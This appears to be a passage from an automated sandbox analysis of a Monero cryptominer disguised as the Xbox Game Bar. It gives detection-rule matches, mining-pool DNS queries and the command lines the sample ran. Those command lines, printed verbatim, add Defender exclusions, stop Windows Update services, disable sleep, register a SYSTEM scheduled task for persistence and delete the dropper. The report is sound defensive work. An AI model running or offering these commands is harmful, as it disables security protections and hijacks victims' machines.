Source: powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.433252957.0000016DE6118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000003.401990259.0000016DE7D53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7B8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.406923080.0000016DE75A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.401990259.0000016DE7CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.447961884.0000016DF5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: unknown

DNS traffic detected: queries for: pool.supportxmr.com

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: GameBar.exe PID: 7948, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

PE file contains section with special chars

Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 24.2.GameBar.exe.7ff6d93f1520.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 24.2.GameBar.exe.7ff6d93edc40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 24.2.GameBar.exe.7ff6d93f1520.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000031.00000002.672175121.0000017AF520B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: GameBar.exe PID: 7948, type: MEMORYSTR	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: GameBar.exe PID: 7948, type: MEMORYSTR	Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: GameBar.exe PID: 7948, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\Temp\drwozmpbokky.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

File deleted: C:\Windows\Temp\drwozmpbokky.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell

Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EED85D0	46_2_00007FF67EED85D0
Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EED3DF0	46_2_00007FF67EED3DF0
Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EED6D90	46_2_00007FF67EED6D90
Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EEC71A0	46_2_00007FF67EEC71A0

Source: C:\Windows\System32\conhost.exe

Code function: String function: 00007FF67EEC3F50 appears 34 times

Source: C:\Windows\System32\conhost.exe

Code function: 46_2_00007FF67EEC3F50 NtQuerySystemInformation,

46_2_00007FF67EEC3F50

Source: GameBar.exe	Binary or memory string: OriginalFilename vs GameBar.exe
Source: GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameWinRing0.sys2 vs GameBar.exe

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Jump to behavior

Source: GameBar.exe

Static PE information: invalid certificate

Source: GameBar.exe.0.dr	Static PE information: Number of sections : 16 > 10
Source: GameBar.exe	Static PE information: Number of sections : 16 > 10

Source: GameBar.exe	Static PE information: Section: ZLIB complexity 0.9963957796391752
Source: GameBar.exe	Static PE information: Section: ZLIB complexity 1.0107421875
Source: GameBar.exe	Static PE information: Section: .reloc ZLIB complexity 1.5
Source: GameBar.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9963957796391752
Source: GameBar.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0107421875
Source: GameBar.exe.0.dr	Static PE information: Section: .reloc ZLIB complexity 1.5

Source: GameBar.exe	ReversingLabs: Detection: 51%
Source: GameBar.exe	Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\GameBar.exe

File read: C:\Users\user\Desktop\GameBar.exe

Jump to behavior

Source: C:\Users\user\Desktop\GameBar.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GameBar.exe C:\Users\user\Desktop\GameBar.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe"
Source: unknown	Process created: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
